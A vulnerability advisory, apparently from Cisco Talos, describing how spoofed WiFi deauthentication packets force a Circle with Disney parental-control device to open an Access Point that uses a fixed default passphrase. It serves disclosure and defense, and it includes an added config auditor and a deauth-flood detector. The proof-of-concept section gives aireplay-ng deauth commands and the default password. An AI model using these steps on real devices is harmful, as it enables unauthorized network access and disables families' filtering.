Talos Vulnerability Report


Circle with Disney WiFi Insecure Access Point Vulnerability

April 4, 2018
CVE Number


Summary

An exploitable vulnerability exists in the WiFi Access Point feature of Circle with Disney running firmware 2.0.1. A series of WiFi packets can force Circle to set up an Access Point with default credentials. An attacker needs to send a series of spoofed “de-auth” packets to trigger this vulnerability.

Tested Versions

Circle with Disney 2.0.1

Product URLs


CVSSv3 Score

6.5 - CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-284: Improper Access Control

Details

Circle with Disney is a network device used to monitor internet use of children on a given network.

Circle can connect to a home network either via WiFi or a wired connection. When no cable connection is possible, Circle switches to WiFi, using the network that was set up during the initial configuration.

When connected via WiFi, the main function in the configd binary continuously checks for network connectivity by calling sub_40A55C. This function verifies that the interface is associated with the Access Point and that it has an IP address assigned. If either check fails, the return value is 0, meaning there is no available connection.

Back in the main function, when there is no connection, function sub_40A2A0 is called with the argument “Internet connection down”. At a high level, the function works as follows:

from os import system

def circle_ap(status):
    # pseudocode for sub_40A2A0: logs the new status, then tears down and
    # restarts the device's own Access Point via circle_ap.sh
    print("setting Wifi Status to %s" % status)
    if status == "paired":
        system("circle_ap.sh down 30 &")
        system("circle_ap.sh up &")                # [1]

At [1] the circle_ap.sh script is called to start an Access Point. Contents of the script are the following:


# note: the case labels and ';;' terminators below are restored from the
# script's own usage string and call sites ("up" / "down" plus an optional
# delay); the address operands of the ifconfig lines were not preserved in
# this copy of the report and are left out rather than guessed.
case $# in
        2)
                sleep $2
                ;;
esac

case "$1" in
        up)
                # nothing to do if hostapd already runs and ra0 is up
                ps | grep [h]ostapd && ifconfig ra0 | grep UP &&  exit 0
                killall hostapd;
                ifconfig eth0                           # address operand not preserved
                ifconfig ra0 netmask up                 # address and mask operands not preserved
                hostapd -B /tmp/hostapd.conf                              # [2]
                $CIRCLE_ROOT/scripts/refresh_hosts.sh ap
                ;;
        down)
                killall hostapd;
                ifconfig ra0 netmask down;              # address and mask operands not preserved
                ;;
        *)
                echo -n "usage: circle_ap <up/down> <optional delay>"
                exit 1
                ;;
esac

exit 0

At [2] hostapd is used to bring up an Access Point using the configuration below.

# grep -e ssid -e wpa /tmp/hostapd.conf
wpa_pairwise=TKIP CCMP

The SSID is “Circle-” followed by the last two hex digits of the MAC address. The “wpa_passphrase” parameter is fixed and does not depend on the device.

Indeed, the base hostapd.conf file is copied from /mnt/shares/usr/bin/scripts/hostapd.conf at boot time by the startcircle script. The only modification applied is the SSID name; the passphrase is taken verbatim from the template.
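The following is an added example, not code from the report or from Circle. It audits a running hostapd.conf against the template it was copied from and reports the weaknesses described above: a wpa_passphrase that is identical to the shipped template (and therefore shared by every unit), a short passphrase, TKIP in wpa_pairwise, and an ssid that is just the product prefix plus two hex digits. The template and both running configs are constructed samples; only the passphrase value “mycircle” and the “Circle-” prefix come from the report, and the remaining keys of the real template are assumed.

```python
"""Audit a hostapd.conf against the template it was generated from.

Added example, not Circle or Talos code. It assumes the running config is a
copy of a shipped template in which only 'ssid' is rewritten, as the report
describes. TEMPLATE and the two running configs are constructed samples.
"""
import re

# Constructed template. Only the passphrase value and the "Circle-" prefix are
# taken from the report; the other keys are assumed for illustration.
TEMPLATE = """\
interface=ra0
ssid=Circle-
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_passphrase=mycircle
wpa_pairwise=TKIP CCMP
"""

# Constructed running config as the report describes it: only ssid changed.
RUNNING_AS_SHIPPED = TEMPLATE.replace("ssid=Circle-\n", "ssid=Circle-A7\n")

# Constructed hardened variant: per-device passphrase, longer SSID suffix, CCMP only.
RUNNING_HARDENED = """\
interface=ra0
ssid=Circle-3F9C
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_passphrase=q7Rv2mX9pL4wZt8h
wpa_pairwise=CCMP
"""

MIN_PASSPHRASE_LEN = 12   # policy threshold chosen for this example


def parse_hostapd_conf(text):
    """Parse key=value lines; blank lines and '#' comments are skipped and a
    repeated key keeps its last value, as hostapd itself does."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        conf[key.strip()] = value.strip()
    return conf


def audit(running_text, template_text):
    """Return a list of human-readable findings (empty means nothing flagged)."""
    running = parse_hostapd_conf(running_text)
    template = parse_hostapd_conf(template_text)
    findings = []
    passphrase = running.get("wpa_passphrase", "")
    # A passphrase equal to the template's is shared by every unit shipped with that template.
    if passphrase and passphrase == template.get("wpa_passphrase"):
        findings.append("wpa_passphrase is unchanged from the shipped template (fixed, device-independent credential)")
    if len(passphrase) < MIN_PASSPHRASE_LEN:
        findings.append("wpa_passphrase is shorter than %d characters" % MIN_PASSPHRASE_LEN)
    if "TKIP" in running.get("wpa_pairwise", "").split():
        findings.append("wpa_pairwise permits TKIP")
    # 'Circle-' plus two hex digits gives only 256 possible names and identifies the product.
    if re.fullmatch(r"Circle-[0-9A-Fa-f]{2}", running.get("ssid", "")):
        findings.append("ssid is the product prefix plus two hex digits of the MAC (predictable)")
    return findings


if __name__ == "__main__":
    for name, cfg in (("as shipped", RUNNING_AS_SHIPPED), ("hardened", RUNNING_HARDENED)):
        print(name + ":", audit(cfg, TEMPLATE) or ["no findings"])
```

The template comparison is the check that matters here: a config whose passphrase still equals the template's is a credential shared across the whole product line, regardless of how strong the string itself looks. Generating the passphrase per device at first boot, and writing it where the owner can read it, removes the finding without touching the rest of the script.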

This feature allows an attacker who has first forced the device off its legitimate WiFi network to connect to the Circle Access Point. The device keeps running but can no longer apply any filtering to the original network; moreover, the attacker now shares a subnet with the device, which enables further attacks that are only possible from a common subnetwork.

As an example, this vulnerability would allow an external attacker to apply TALOS-2017-0396 and TALOS-2017-0371 to completely compromise the device.

Exploit Proof-of-Concept

The following proof of concept shows how to make the device disconnect from its legitimate WiFi network and start its own Access Point, by sending a series of “deauth” packets.

$ airmon-ng start wlan0 1
$ aireplay-ng --deauth 10000 -a $WIFI_ROUTER_MAC -c $CIRCLE_MAC mon0

After a new Access Point is detected with a name starting with “Circle-”, it is possible to connect to it using the password “mycircle”.
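As a defender-side counterpart to the proof of concept, the following added example (not from the report) runs a simple deauthentication-flood detector over constructed 802.11 management-frame records of the kind a monitor-mode sensor would log. The record layout (timestamp, frame subtype, addr1 as receiver, addr2 as transmitter), the MAC addresses and the thresholds are all assumptions for this example.

```python
"""Flag deauthentication floods in 802.11 management-frame records.

Added example, not Circle or Talos code. The records below are constructed;
the field layout (time, subtype, addr1=receiver, addr2=transmitter) is an
assumption about how the sensor exports frames.
"""
from collections import defaultdict, deque

# Placeholder MACs for the home router, the Circle device and an unrelated station.
ROUTER = "00:11:22:33:44:55"
CIRCLE = "66:77:88:99:aa:bb"
OTHER = "cc:dd:ee:ff:00:11"

# Constructed capture: a burst of 60 deauth frames in 120 ms, purportedly sent by
# the router (addr2) to the Circle device (addr1), plus a data frame and one lone
# deauth to another station that should not trigger an alert.
SAMPLE_FRAMES = (
    [(i * 0.002, "deauth", CIRCLE, ROUTER) for i in range(60)]
    + [(0.050, "data", ROUTER, OTHER), (0.120, "deauth", OTHER, ROUTER)]
)


def detect_deauth_floods(frames, window_s=1.0, threshold=10):
    """Return one alert per (transmitter, receiver) pair whose deauth count
    exceeds `threshold` inside any sliding window of `window_s` seconds."""
    recent = defaultdict(deque)   # (addr2, addr1) -> timestamps of recent deauths
    alerted = set()
    alerts = []
    for ts, subtype, addr1, addr2 in sorted(frames, key=lambda f: f[0]):
        if subtype != "deauth":
            continue
        key = (addr2, addr1)
        q = recent[key]
        q.append(ts)
        while q and ts - q[0] > window_s:   # drop timestamps outside the window
            q.popleft()
        if len(q) > threshold and key not in alerted:
            alerted.add(key)
            alerts.append({
                "transmitter": addr2, "receiver": addr1,
                "count": len(q), "first": q[0], "last": ts,
            })
    return alerts


if __name__ == "__main__":
    for a in detect_deauth_floods(SAMPLE_FRAMES):
        print("deauth flood: %(count)d frames from %(transmitter)s to %(receiver)s "
              "between t=%(first).3f and t=%(last).3f" % a)
```

On a home network, a burst of deauth frames addressed to the device followed shortly by a beacon advertising a new “Circle-” SSID is the signature of this attack, so the two events are worth correlating in the same sensor. Because the frames are spoofed to look like they come from the router, the transmitter address alone does not identify the attacker; it identifies the station being impersonated. Where both the router and the client support 802.11w (Protected Management Frames), unauthenticated deauth frames are rejected, which removes the trigger for this behaviour.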

Timeline

2017-09-20 - Vendor Disclosure
2018-03-29 - Public Release

Credit

Discovered by Claudio Bozzato and Lilith Wyatt of Cisco Talos.